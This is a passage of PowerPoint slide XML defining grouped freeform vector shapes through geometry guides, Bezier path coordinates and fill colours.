                    <a:gd name="T4" fmla="*/ 299 w 299"/>
                    <a:gd name="T5" fmla="*/ 393 h 393"/>
                    <a:gd name="T6" fmla="*/ 299 w 299"/>
                    <a:gd name="T7" fmla="*/ 81 h 393"/>
                    <a:gd name="T8" fmla="*/ 0 w 299"/>
                    <a:gd name="T9" fmla="*/ 0 h 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9" h="393">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="312"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="393"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="8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993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95" name="Freeform 1043">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F17133-9AAF-4630-B941-CD953EE467A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347" y="3655"/>
                  <a:ext cx="453" cy="121"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 453"/>
                    <a:gd name="T1" fmla="*/ 41 h 121"/>
                    <a:gd name="T2" fmla="*/ 154 w 453"/>
                    <a:gd name="T3" fmla="*/ 0 h 121"/>
                    <a:gd name="T4" fmla="*/ 453 w 453"/>
                    <a:gd name="T5" fmla="*/ 81 h 121"/>
                    <a:gd name="T6" fmla="*/ 302 w 453"/>
                    <a:gd name="T7" fmla="*/ 121 h 121"/>
                    <a:gd name="T8" fmla="*/ 0 w 453"/>
                    <a:gd name="T9" fmla="*/ 41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3" h="121">
                      <a:moveTo>
                        <a:pt x="0" y="41"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="154" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="81"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="302" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="41"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF993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96" name="Freeform 1044">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2228A7E-8F0A-4059-92B9-34D15677AF1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800" y="3532"/>
                  <a:ext cx="454" cy="123"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 454"/>
                    <a:gd name="T1" fmla="*/ 41 h 123"/>
                    <a:gd name="T2" fmla="*/ 154 w 454"/>
                    <a:gd name="T3" fmla="*/ 0 h 123"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 81 h 123"/>
                    <a:gd name="T6" fmla="*/ 303 w 454"/>
                    <a:gd name="T7" fmla="*/ 123 h 123"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 41 h 1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123">
                      <a:moveTo>
                        <a:pt x="0" y="41"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="154" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="81"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="303" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="41"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF993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97" name="Freeform 1045">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9632749-8ED2-4689-B86F-4255830CC5E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354" y="3535"/>
                  <a:ext cx="446" cy="120"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 446"/>
                    <a:gd name="T1" fmla="*/ 80 h 120"/>
                    <a:gd name="T2" fmla="*/ 302 w 446"/>
                    <a:gd name="T3" fmla="*/ 0 h 120"/>
                    <a:gd name="T4" fmla="*/ 446 w 446"/>
                    <a:gd name="T5" fmla="*/ 38 h 120"/>
                    <a:gd name="T6" fmla="*/ 147 w 446"/>
                    <a:gd name="T7" fmla="*/ 120 h 120"/>
                    <a:gd name="T8" fmla="*/ 0 w 446"/>
                    <a:gd name="T9" fmla="*/ 80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6" h="120">
                      <a:moveTo>
                        <a:pt x="0" y="80"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="302" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="120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rgbClr val="FF993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98" name="Freeform 1046">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D84740B4-2641-4158-8CCF-137E825E623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800" y="3655"/>
                  <a:ext cx="449" cy="119"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 449"/>
                    <a:gd name="T1" fmla="*/ 81 h 119"/>
                    <a:gd name="T2" fmla="*/ 303 w 449"/>
                    <a:gd name="T3" fmla="*/ 0 h 119"/>
                    <a:gd name="T4" fmla="*/ 449 w 449"/>
                    <a:gd name="T5" fmla="*/ 38 h 119"/>
                    <a:gd name="T6" fmla="*/ 147 w 449"/>
                    <a:gd name="T7" fmla="*/ 119 h 119"/>
                    <a:gd name="T8" fmla="*/ 0 w 449"/>
                    <a:gd name="T9" fmla="*/ 8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9" h="119">
                      <a:moveTo>
                        <a:pt x="0" y="81"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="303" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="449" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="119"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="81"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF993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86" name="Group 1047">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{349BF03F-E9BB-4D90-A5AE-6551B8FC5501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1408" y="2090"/>
                <a:ext cx="55" cy="43"/>
                <a:chOff x="1315" y="1508"/>
                <a:chExt cx="596" cy="469"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1888" name="Freeform 1048">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DE146ED-7E04-4871-838C-02D33B0BA9B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315" y="1508"/>
                  <a:ext cx="596" cy="161"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 904"/>
                    <a:gd name="T1" fmla="*/ 123 h 244"/>
                    <a:gd name="T2" fmla="*/ 451 w 904"/>
                    <a:gd name="T3" fmla="*/ 0 h 244"/>
                    <a:gd name="T4" fmla="*/ 904 w 904"/>
                    <a:gd name="T5" fmla="*/ 123 h 244"/>
                    <a:gd name="T6" fmla="*/ 451 w 904"/>
                    <a:gd name="T7" fmla="*/ 244 h 244"/>
                    <a:gd name="T8" fmla="*/ 0 w 904"/>
                    <a:gd name="T9" fmla="*/ 123 h 2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rgbClr val="2A79D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89" name="Freeform 1049">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B5F74A4-F51F-4030-AE4D-F9D781F72E4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612" y="1589"/>
                  <a:ext cx="299" cy="388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 453"/>
                    <a:gd name="T1" fmla="*/ 589 h 589"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 121 h 589"/>
                    <a:gd name="T4" fmla="*/ 453 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 589"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 468 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 453"/>
                    <a:gd name="T9" fmla="*/ 589 h 5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rgbClr val="2A79D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90" name="Freeform 1050">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB515354-5C01-494C-9737-F1F93C4D9F9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315" y="1589"/>
                  <a:ext cx="297" cy="388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 0 h 589"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 468 h 589"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 589 h 589"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 121 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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A79D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887" name="Freeform 1051">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2CFBBFA-7617-4749-B588-240AF1C2413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470" y="2215"/>
                <a:ext cx="135" cy="35"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 668 w 668"/>
                  <a:gd name="T1" fmla="*/ 76 h 177"/>
                  <a:gd name="T2" fmla="*/ 377 w 668"/>
                  <a:gd name="T3" fmla="*/ 0 h 177"/>
                  <a:gd name="T4" fmla="*/ 0 w 668"/>
                  <a:gd name="T5" fmla="*/ 102 h 177"/>
                  <a:gd name="T6" fmla="*/ 288 w 668"/>
                  <a:gd name="T7" fmla="*/ 177 h 177"/>
                  <a:gd name="T8" fmla="*/ 668 w 668"/>
                  <a:gd name="T9" fmla="*/ 76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8" h="177">
                    <a:moveTo>
                      <a:pt x="668" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="377" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="7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719" name="Freeform 2082">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC431B0D-103E-4B91-9FD4-0C9391E40B80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7296024" y="3364465"/>
              <a:ext cx="1736134" cy="466384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chemeClr val="bg1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720" name="Group 421">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D363D5B3-47C6-4F30-95F7-A09FBC805E3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7772892" y="3390095"/>
              <a:ext cx="454025" cy="346075"/>
              <a:chOff x="1722" y="2589"/>
              <a:chExt cx="866" cy="661"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1856" name="Group 422">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D945818-4668-4ADC-BF8F-D92CD570BC64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2182" y="2589"/>
                <a:ext cx="312" cy="532"/>
                <a:chOff x="1924" y="1129"/>
                <a:chExt cx="312" cy="532"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1877" name="Freeform 423">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A56584CF-C6AE-4B6C-9C5C-D34D0B9F39F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gray">
                <a:xfrm>
                  <a:off x="1924" y="1216"/>
                  <a:ext cx="312" cy="245"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 237"/>
                    <a:gd name="T1" fmla="*/ 113 h 186"/>
                    <a:gd name="T2" fmla="*/ 235 w 237"/>
                    <a:gd name="T3" fmla="*/ 113 h 186"/>
                    <a:gd name="T4" fmla="*/ 225 w 237"/>
                    <a:gd name="T5" fmla="*/ 49 h 186"/>
                    <a:gd name="T6" fmla="*/ 199 w 237"/>
                    <a:gd name="T7" fmla="*/ 24 h 186"/>
                    <a:gd name="T8" fmla="*/ 156 w 237"/>
                    <a:gd name="T9" fmla="*/ 12 h 186"/>
                    <a:gd name="T10" fmla="*/ 116 w 237"/>
                    <a:gd name="T11" fmla="*/ 2 h 186"/>
                    <a:gd name="T12" fmla="*/ 87 w 237"/>
                    <a:gd name="T13" fmla="*/ 12 h 186"/>
                    <a:gd name="T14" fmla="*/ 73 w 237"/>
                    <a:gd name="T15" fmla="*/ 85 h 186"/>
                    <a:gd name="T16" fmla="*/ 73 w 237"/>
                    <a:gd name="T17" fmla="*/ 85 h 186"/>
                    <a:gd name="T18" fmla="*/ 72 w 237"/>
                    <a:gd name="T19" fmla="*/ 90 h 186"/>
                    <a:gd name="T20" fmla="*/ 21 w 237"/>
                    <a:gd name="T21" fmla="*/ 104 h 186"/>
                    <a:gd name="T22" fmla="*/ 26 w 237"/>
                    <a:gd name="T23" fmla="*/ 135 h 186"/>
                    <a:gd name="T24" fmla="*/ 80 w 237"/>
                    <a:gd name="T25" fmla="*/ 122 h 186"/>
                    <a:gd name="T26" fmla="*/ 80 w 237"/>
                    <a:gd name="T27" fmla="*/ 122 h 186"/>
                    <a:gd name="T28" fmla="*/ 86 w 237"/>
                    <a:gd name="T29" fmla="*/ 120 h 186"/>
                    <a:gd name="T30" fmla="*/ 99 w 237"/>
                    <a:gd name="T31" fmla="*/ 112 h 186"/>
                    <a:gd name="T32" fmla="*/ 104 w 237"/>
                    <a:gd name="T33" fmla="*/ 92 h 186"/>
                    <a:gd name="T34" fmla="*/ 104 w 237"/>
                    <a:gd name="T35" fmla="*/ 92 h 186"/>
                    <a:gd name="T36" fmla="*/ 110 w 237"/>
                    <a:gd name="T37" fmla="*/ 47 h 186"/>
                    <a:gd name="T38" fmla="*/ 109 w 237"/>
                    <a:gd name="T39" fmla="*/ 160 h 186"/>
                    <a:gd name="T40" fmla="*/ 119 w 237"/>
                    <a:gd name="T41" fmla="*/ 170 h 186"/>
                    <a:gd name="T42" fmla="*/ 169 w 237"/>
                    <a:gd name="T43" fmla="*/ 184 h 186"/>
                    <a:gd name="T44" fmla="*/ 196 w 237"/>
                    <a:gd name="T45" fmla="*/ 165 h 186"/>
                    <a:gd name="T46" fmla="*/ 196 w 237"/>
                    <a:gd name="T47" fmla="*/ 160 h 186"/>
                    <a:gd name="T48" fmla="*/ 216 w 237"/>
                    <a:gd name="T49" fmla="*/ 155 h 186"/>
                    <a:gd name="T50" fmla="*/ 219 w 237"/>
                    <a:gd name="T51" fmla="*/ 154 h 186"/>
                    <a:gd name="T52" fmla="*/ 232 w 237"/>
                    <a:gd name="T53" fmla="*/ 146 h 186"/>
                    <a:gd name="T54" fmla="*/ 237 w 237"/>
                    <a:gd name="T55" fmla="*/ 124 h 186"/>
                    <a:gd name="T56" fmla="*/ 235 w 237"/>
                    <a:gd name="T57" fmla="*/ 113 h 186"/>
                    <a:gd name="T58" fmla="*/ 193 w 237"/>
                    <a:gd name="T59" fmla="*/ 75 h 186"/>
                    <a:gd name="T60" fmla="*/ 194 w 237"/>
                    <a:gd name="T61" fmla="*/ 87 h 186"/>
                    <a:gd name="T62" fmla="*/ 200 w 237"/>
                    <a:gd name="T63" fmla="*/ 123 h 186"/>
                    <a:gd name="T64" fmla="*/ 196 w 237"/>
                    <a:gd name="T65" fmla="*/ 124 h 186"/>
                    <a:gd name="T66" fmla="*/ 194 w 237"/>
                    <a:gd name="T67" fmla="*/ 87 h 186"/>
                    <a:gd name="T68" fmla="*/ 193 w 237"/>
                    <a:gd name="T69" fmla="*/ 75 h 186"/>
                    <a:gd name="T70" fmla="*/ 192 w 237"/>
                    <a:gd name="T71" fmla="*/ 70 h 186"/>
                    <a:gd name="T72" fmla="*/ 193 w 237"/>
                    <a:gd name="T73" fmla="*/ 75 h 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7" h="186">
                      <a:moveTo>
                        <a:pt x="235" y="113"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="84"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="223" y="32"/>
                        <a:pt x="207" y="26"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="90" y="4"/>
                        <a:pt x="87" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="29" y="102"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="108"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="65"/>
                        <a:pt x="111" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="117"/>
                        <a:pt x="109" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="165"/>
                        <a:pt x="112" y="170"/>
                        <a:pt x="119" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="131" y="173"/>
                        <a:pt x="162" y="183"/>
                        <a:pt x="169" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="186"/>
                        <a:pt x="193" y="176"/>
                        <a:pt x="196" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="163"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="209" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="154"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="141"/>
                        <a:pt x="237" y="135"/>
                        <a:pt x="237" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="113"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="193" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="96"/>
                        <a:pt x="198" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="123"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="193" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="193" y="73"/>
                        <a:pt x="193" y="7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78" name="Freeform 424">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDCB2285-E053-4570-9248-8A48E61B4B1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2079" y="1200"/>
                  <a:ext cx="87" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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5"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="48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79" name="Freeform 425">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F740B5-5950-4533-9365-F2AECF7504E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973" y="1424"/>
                  <a:ext cx="209" cy="237"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 159 w 159"/>
                    <a:gd name="T1" fmla="*/ 6 h 180"/>
                    <a:gd name="T2" fmla="*/ 132 w 159"/>
                    <a:gd name="T3" fmla="*/ 21 h 180"/>
                    <a:gd name="T4" fmla="*/ 81 w 159"/>
                    <a:gd name="T5" fmla="*/ 11 h 180"/>
                    <a:gd name="T6" fmla="*/ 72 w 159"/>
                    <a:gd name="T7" fmla="*/ 0 h 180"/>
                    <a:gd name="T8" fmla="*/ 68 w 159"/>
                    <a:gd name="T9" fmla="*/ 19 h 180"/>
                    <a:gd name="T10" fmla="*/ 17 w 159"/>
                    <a:gd name="T11" fmla="*/ 32 h 180"/>
                    <a:gd name="T12" fmla="*/ 1 w 159"/>
                    <a:gd name="T13" fmla="*/ 55 h 180"/>
                    <a:gd name="T14" fmla="*/ 1 w 159"/>
                    <a:gd name="T15" fmla="*/ 145 h 180"/>
                    <a:gd name="T16" fmla="*/ 36 w 159"/>
                    <a:gd name="T17" fmla="*/ 156 h 180"/>
                    <a:gd name="T18" fmla="*/ 43 w 159"/>
                    <a:gd name="T19" fmla="*/ 145 h 180"/>
                    <a:gd name="T20" fmla="*/ 42 w 159"/>
                    <a:gd name="T21" fmla="*/ 73 h 180"/>
                    <a:gd name="T22" fmla="*/ 42 w 159"/>
                    <a:gd name="T23" fmla="*/ 73 h 180"/>
                    <a:gd name="T24" fmla="*/ 42 w 159"/>
                    <a:gd name="T25" fmla="*/ 72 h 180"/>
                    <a:gd name="T26" fmla="*/ 42 w 159"/>
                    <a:gd name="T27" fmla="*/ 66 h 180"/>
                    <a:gd name="T28" fmla="*/ 42 w 159"/>
                    <a:gd name="T29" fmla="*/ 64 h 180"/>
                    <a:gd name="T30" fmla="*/ 42 w 159"/>
                    <a:gd name="T31" fmla="*/ 63 h 180"/>
                    <a:gd name="T32" fmla="*/ 59 w 159"/>
                    <a:gd name="T33" fmla="*/ 41 h 180"/>
                    <a:gd name="T34" fmla="*/ 103 w 159"/>
                    <a:gd name="T35" fmla="*/ 30 h 180"/>
                    <a:gd name="T36" fmla="*/ 103 w 159"/>
                    <a:gd name="T37" fmla="*/ 30 h 180"/>
                    <a:gd name="T38" fmla="*/ 59 w 159"/>
                    <a:gd name="T39" fmla="*/ 41 h 180"/>
                    <a:gd name="T40" fmla="*/ 42 w 159"/>
                    <a:gd name="T41" fmla="*/ 63 h 180"/>
                    <a:gd name="T42" fmla="*/ 42 w 159"/>
                    <a:gd name="T43" fmla="*/ 71 h 180"/>
                    <a:gd name="T44" fmla="*/ 42 w 159"/>
                    <a:gd name="T45" fmla="*/ 72 h 180"/>
                    <a:gd name="T46" fmla="*/ 42 w 159"/>
                    <a:gd name="T47" fmla="*/ 77 h 180"/>
                    <a:gd name="T48" fmla="*/ 42 w 159"/>
                    <a:gd name="T49" fmla="*/ 77 h 180"/>
                    <a:gd name="T50" fmla="*/ 43 w 159"/>
                    <a:gd name="T51" fmla="*/ 154 h 180"/>
                    <a:gd name="T52" fmla="*/ 43 w 159"/>
                    <a:gd name="T53" fmla="*/ 154 h 180"/>
                    <a:gd name="T54" fmla="*/ 43 w 159"/>
                    <a:gd name="T55" fmla="*/ 157 h 180"/>
                    <a:gd name="T56" fmla="*/ 84 w 159"/>
                    <a:gd name="T57" fmla="*/ 157 h 180"/>
                    <a:gd name="T58" fmla="*/ 85 w 159"/>
                    <a:gd name="T59" fmla="*/ 77 h 180"/>
                    <a:gd name="T60" fmla="*/ 89 w 159"/>
                    <a:gd name="T61" fmla="*/ 69 h 180"/>
                    <a:gd name="T62" fmla="*/ 141 w 159"/>
                    <a:gd name="T63" fmla="*/ 55 h 180"/>
                    <a:gd name="T64" fmla="*/ 159 w 159"/>
                    <a:gd name="T65" fmla="*/ 25 h 180"/>
                    <a:gd name="T66" fmla="*/ 159 w 159"/>
                    <a:gd name="T67" fmla="*/ 8 h 180"/>
                    <a:gd name="T68" fmla="*/ 159 w 159"/>
                    <a:gd name="T69" fmla="*/ 6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9" h="180">
                      <a:moveTo>
                        <a:pt x="159" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="17"/>
                        <a:pt x="140" y="23"/>
                        <a:pt x="132" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="20"/>
                        <a:pt x="94" y="14"/>
                        <a:pt x="81" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="10"/>
                        <a:pt x="73" y="5"/>
                        <a:pt x="72" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="19"/>
                        <a:pt x="72" y="18"/>
                        <a:pt x="68" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
